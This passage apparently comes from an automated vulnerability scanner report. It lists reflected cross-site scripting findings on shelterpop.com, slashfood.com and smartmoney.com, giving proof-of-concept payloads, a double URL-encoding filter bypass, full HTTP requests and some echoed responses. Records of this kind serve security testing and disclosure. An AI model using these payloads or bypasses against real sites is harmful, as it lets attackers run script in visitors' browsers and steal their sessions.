The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8bed"><script>alert(1)</script>427cdd79cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e8bed"><script>alert(1)</script>427cdd79cfd=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728aa"><a>fbe6569a59a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/famous-homes728aa"><a>fbe6569a59a/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36eee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85a90e980ac was submitted in the REST URL parameter 2. This input was echoed as 36eee</script><script>alert(1)</script>85a90e980ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/famous-homes36eee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85a90e980ac/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.626. http://www.shelterpop.com/category/famous-homes/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/famous-homes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9ef"><script>alert(1)</script>a474d1bac20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/famous-homes/?2e9ef"><script>alert(1)</script>a474d1bac20=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9fd9%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ac0efbba8 was submitted in the REST URL parameter 2. This input was echoed as d9fd9</script><script>alert(1)</script>60ac0efbba8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/fun-stuffd9fd9%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ac0efbba8/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"><a>f19ef0c94bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/fun-stuff4c0ad"><a>f19ef0c94bc/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/fun-stuff4c0ad"><a>f19ef0c94bc/" /> ...[SNIP]...
1.629. http://www.shelterpop.com/category/fun-stuff/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/fun-stuff/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 813a1"><script>alert(1)</script>f4b4b7353f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fun-stuff/?813a1"><script>alert(1)</script>f4b4b7353f8=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e56f47603e11 was submitted in the REST URL parameter 2. This input was echoed as 641ee</script><script>alert(1)</script>56f47603e11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/gardening641ee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e56f47603e11/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1147"><a>606c3770cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/gardeningf1147"><a>606c3770cc8/ HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/gardeningf1147"><a>606c3770cc8/" /> ...[SNIP]...
1.632. http://www.shelterpop.com/category/gardening/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/gardening/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef409"><script>alert(1)</script>d58cbccc64c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/gardening/?ef409"><script>alert(1)</script>d58cbccc64c=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/gardening/?ef409"><script>alert(1)</script>d58cbccc64c=1" /> ...[SNIP]...
1.633. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slashfood.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56532"><script>alert(1)</script>375a63e9c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?56532"><script>alert(1)</script>375a63e9c9a=1 HTTP/1.1
Host: www.slashfood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa2c4'-alert(1)-'46ed6e85f39 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfsaa2c4'-alert(1)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload 8f0a4%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec36879017da was submitted in the REST URL parameter 3. This input was echoed as 8f0a4--><script>alert(1)</script>c36879017da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-12968382610788f0a4%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec36879017da/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 19:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=DD5921E0%2D9E15%2D2350%2D10E6DA3D1269129C;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:53:00 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:00 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:00 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: are-hedgefund-etfs-worth-owning-12968382610788f0a4--><script>alert(1)</script>c36879017da --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe363"%3balert(1)//995ff310c7 was submitted in the cid parameter. This input was echoed as fe363";alert(1)//995ff310c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSSfe363"%3balert(1)//995ff310c7 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb1e'-alert(1)-'e0cb2e7abcc was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSSccb1e'-alert(1)-'e0cb2e7abcc HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99e5e"><img%20src%3da%20onerror%3dalert(1)>ecbe8eb5e2a was submitted in the cid parameter. This input was echoed as 99e5e"><img src=a onerror=alert(1)>ecbe8eb5e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSS99e5e"><img%20src%3da%20onerror%3dalert(1)>ecbe8eb5e2a HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.639. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18785'-alert(1)-'36d3424e573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?18785'-alert(1)-'36d3424e573=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.640. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19d8"><a>7d19afe1560 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?a19d8"><a>7d19afe1560=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24155'-alert(1)-'1dc0411d84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks24155'-alert(1)-'1dc0411d84/should-investors-panic-over-egypt-1296838406557/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload aa756%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5039f8ae3bc was submitted in the REST URL parameter 3. This input was echoed as aa756--><script>alert(1)</script>5039f8ae3bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557aa756%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5039f8ae3bc/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 19:52:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=DD5772BC%2DE9AA%2D33D4%2D9FBC30FED0704BE0;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:52:48 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:52:48 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:52:48 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8d45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: should-investors-panic-over-egypt-1296838406557aa756--><script>alert(1)</script>5039f8ae3bc --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c7c7'-alert(1)-'d4a29c3988d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSS1c7c7'-alert(1)-'d4a29c3988d HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfeaf"%3balert(1)//72d14877f5 was submitted in the cid parameter. This input was echoed as bfeaf";alert(1)//72d14877f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSSbfeaf"%3balert(1)//72d14877f5 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb506"><img%20src%3da%20onerror%3dalert(1)>e21999d567b was submitted in the cid parameter. This input was echoed as cb506"><img src=a onerror=alert(1)>e21999d567b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSScb506"><img%20src%3da%20onerror%3dalert(1)>e21999d567b HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.646. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49374"><a>f1236e573e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?49374"><a>f1236e573e3=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.647. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb8a2'-alert(1)-'cdf627df069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?eb8a2'-alert(1)-'cdf627df069=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c8ea'-alert(1)-'a950531d8fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel6c8ea'-alert(1)-'a950531d8fc/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSS HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload cd100%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5254c019448 was submitted in the REST URL parameter 3. This input was echoed as cd100--><script>alert(1)</script>5254c019448 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520cd100%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5254c019448/?cid=sm_dailyfinanceRSS HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 19:53:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=DD59CB52%2DB026%2D0B3A%2D1713F70CEE191701;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:53:04 GMT;path=/
Set-Cookie: ADCID=sm%5FdailyfinanceRSS;domain=.smartmoney.com;path=/
Set-Cookie: ADCID=sm%5FdailyfinanceRSS;domain=.smartmoney.com;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:04 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:09 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: skiing-with-olympic-stars-1296852410520cd100--><script>alert(1)</script>5254c019448 --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 381f1'-alert(1)-'a9f664bc8ae was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSS381f1'-alert(1)-'a9f664bc8ae HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9d62"%3balert(1)//b6f52c654db was submitted in the cid parameter. This input was echoed as c9d62";alert(1)//b6f52c654db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSSc9d62"%3balert(1)//b6f52c654db HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d7"><img%20src%3da%20onerror%3dalert(1)>28dafd426a4 was submitted in the cid parameter. This input was echoed as d28d7"><img src=a onerror=alert(1)>28dafd426a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSSd28d7"><img%20src%3da%20onerror%3dalert(1)>28dafd426a4 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.653. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4993c"><a>2ab8a0cc3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?4993c"><a>2ab8a0cc3f5=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
